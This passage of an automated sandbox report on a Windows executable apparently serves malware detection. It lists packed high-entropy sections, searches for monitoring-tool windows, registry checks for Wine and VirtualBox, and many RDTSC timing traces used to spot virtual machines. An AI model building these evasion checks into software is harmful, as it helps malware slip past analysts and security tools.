                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB372 push ecx; ret 0_2_006FB381
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FEB53 push eax; mov dword ptr [esp], ebp0_2_006FEC70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB323 push ecx; ret 0_2_006FB332
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FAB32 push ecx; ret 0_2_006FAB41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FAB0A push eax; ret 0_2_006FAB19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FEB1E push ecx; mov dword ptr [esp], edx0_2_006FEB23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FEB1E push eax; mov dword ptr [esp], ebp0_2_006FEC70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FABFB push ebp; ret 0_2_006FAC0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FEBC7 push eax; mov dword ptr [esp], ebp0_2_006FEC70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FABC4 push edx; ret 0_2_006FABD3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FCBA9 push ebp; mov dword ptr [esp], 2F56353Ah0_2_006FCBB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FCBA9 push ebx; mov dword ptr [esp], edi0_2_006FCBD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FCBA9 push 1A5101C1h; mov dword ptr [esp], ebx0_2_006FCC22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FCB82 push ebp; mov dword ptr [esp], 2F56353Ah0_2_006FCBB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FCB82 push ebx; mov dword ptr [esp], edi0_2_006FCBD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FCB82 push 1A5101C1h; mov dword ptr [esp], ebx0_2_006FCC22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB39E push ebx; ret 0_2_006FB3AD
                Source: file.exeStatic PE information: section name: entropy: 7.941794412700174
                Source: file.exeStatic PE information: section name: iqkzmigc entropy: 7.9499747194883374

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4742E9 second address: 4742EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4742EE second address: 4742FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4742FB second address: 4742FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4742FF second address: 473BCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c jnl 00007F99FD381EF3h 0x00000012 jmp 00007F99FD381EEDh 0x00000017 push dword ptr [ebp+122D0B81h] 0x0000001d pushad 0x0000001e add dword ptr [ebp+122D35E3h], eax 0x00000024 xor edx, dword ptr [ebp+122D38CDh] 0x0000002a popad 0x0000002b call dword ptr [ebp+122D185Bh] 0x00000031 pushad 0x00000032 clc 0x00000033 xor eax, eax 0x00000035 pushad 0x00000036 mov dword ptr [ebp+122D3537h], ecx 0x0000003c mov di, 2E5Eh 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 cld 0x00000046 mov dword ptr [ebp+122D37D1h], eax 0x0000004c mov dword ptr [ebp+122D372Fh], ecx 0x00000052 mov esi, 0000003Ch 0x00000057 jmp 00007F99FD381EF7h 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 ja 00007F99FD381EF1h 0x00000066 lodsw 0x00000068 mov dword ptr [ebp+122D3735h], ecx 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F99FD381EF6h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b jmp 00007F99FD381EF5h 0x00000080 nop 0x00000081 jnl 00007F99FD381F01h 0x00000087 push eax 0x00000088 pushad 0x00000089 push eax 0x0000008a push edx 0x0000008b push esi 0x0000008c pop esi 0x0000008d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E5A61 second address: 5E5A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE5D3 second address: 5EE5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE5D7 second address: 5EE5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F99FCCDC7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE5E3 second address: 5EE602 instructions: 0x00000000 rdtsc 0x00000002 je 00007F99FD381EF8h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE758 second address: 5EE776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F99FCCDC7DCh 0x0000000b jp 00007F99FCCDC7D8h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE776 second address: 5EE7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EEFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F99FD381EF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EECCE second address: 5EECDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jbe 00007F99FCCDC7D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F06B7 second address: 5F06BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F06BD second address: 5F06C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F06C1 second address: 5F06F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jp 00007F99FD381EE6h 0x00000015 jmp 00007F99FD381EF4h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07DF second address: 5F07E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07E3 second address: 5F07F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F07F5 second address: 5F08EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7E2h 0x00000008 js 00007F99FCCDC7D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jno 00007F99FCCDC7ECh 0x00000018 push 00000000h 0x0000001a add dx, 3CD8h 0x0000001f push C7E7363Eh 0x00000024 push ecx 0x00000025 jmp 00007F99FCCDC7E5h 0x0000002a pop ecx 0x0000002b add dword ptr [esp], 3818CA42h 0x00000032 je 00007F99FCCDC7F2h 0x00000038 call 00007F99FCCDC7E9h 0x0000003d pushad 0x0000003e popad 0x0000003f pop esi 0x00000040 push 00000003h 0x00000042 mov edi, dword ptr [ebp+122D3905h] 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F99FCCDC7D8h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 0000001Dh 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 jmp 00007F99FCCDC7E4h 0x00000069 xor dx, DCBBh 0x0000006e jmp 00007F99FCCDC7E1h 0x00000073 push 00000003h 0x00000075 call 00007F99FCCDC7D9h 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e jno 00007F99FCCDC7D6h 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F08EA second address: 5F08F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F08F0 second address: 5F0901 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99FCCDC7D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6111B5 second address: 6111B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611598 second address: 6115AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jnl 00007F99FCCDC7DCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6115AF second address: 6115B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6115B5 second address: 6115B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608B36 second address: 608B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 608B3C second address: 608B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611990 second address: 6119A5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F99FD381EEBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6119A5 second address: 6119AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611FA3 second address: 611FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612121 second address: 612126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6122C6 second address: 6122CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6122CA second address: 6122CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6122CE second address: 6122D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6126DC second address: 6126F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6126F0 second address: 612702 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99FD381EECh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612702 second address: 612706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612706 second address: 61270A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615120 second address: 615124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615124 second address: 615141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61578C second address: 6157B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7E8h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6157B1 second address: 615812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EF1h 0x00000009 popad 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push esi 0x00000010 jmp 00007F99FD381EF5h 0x00000015 pop esi 0x00000016 mov eax, dword ptr [eax] 0x00000018 js 00007F99FD381EFFh 0x0000001e jmp 00007F99FD381EF9h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a jnc 00007F99FD381EE6h 0x00000030 pop ebx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 615962 second address: 615966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6191B2 second address: 6191B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6191B6 second address: 6191BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6191BA second address: 6191D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F99FD381EEDh 0x0000000b je 00007F99FD381EEEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E73D9 second address: 5E73F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DEh 0x00000007 jns 00007F99FCCDC7D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E73F4 second address: 5E742E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F99FD381EE6h 0x0000000c popad 0x0000000d jmp 00007F99FD381EF5h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F99FD381EF4h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C763 second address: 61C769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C769 second address: 61C77B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a ja 00007F99FD381EECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CD12 second address: 61CD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CD18 second address: 61CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CE32 second address: 61CE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F400 second address: 61F405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F405 second address: 61F426 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F99FCCDC7EBh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F99FCCDC7E3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F426 second address: 61F42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FB3A second address: 61FB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FB3E second address: 61FB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FF53 second address: 61FF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FF57 second address: 61FF65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F99FD381EE6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6200E4 second address: 6200EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62026F second address: 6202A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F99FD381EF4h 0x0000000c jno 00007F99FD381EE6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 jmp 00007F99FD381EF2h 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62078B second address: 620795 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620795 second address: 6207BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FD381EF2h 0x00000008 jng 00007F99FD381EE6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6208A0 second address: 6208A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6208A5 second address: 6208AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6209A9 second address: 6209BE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99FCCDC7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620D45 second address: 620D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620D4E second address: 620D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620D52 second address: 620D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62383F second address: 623875 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99FCCDC7E4h 0x00000008 jmp 00007F99FCCDC7DEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007F99FCCDC7E5h 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62361E second address: 623623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624080 second address: 624093 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99FCCDC7D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6249DC second address: 6249E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624093 second address: 62409D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624C44 second address: 624C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6249E0 second address: 6249F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99FCCDC7DDh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62409D second address: 6240A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F99FD381EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624C4B second address: 624CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or dword ptr [ebp+122D2873h], ecx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F99FCCDC7D8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jno 00007F99FCCDC7E2h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F99FCCDC7D8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xchg eax, ebx 0x0000004f jnc 00007F99FCCDC7E8h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F99FCCDC7DEh 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6240A7 second address: 6240AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62631C second address: 626321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6254E4 second address: 6254FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
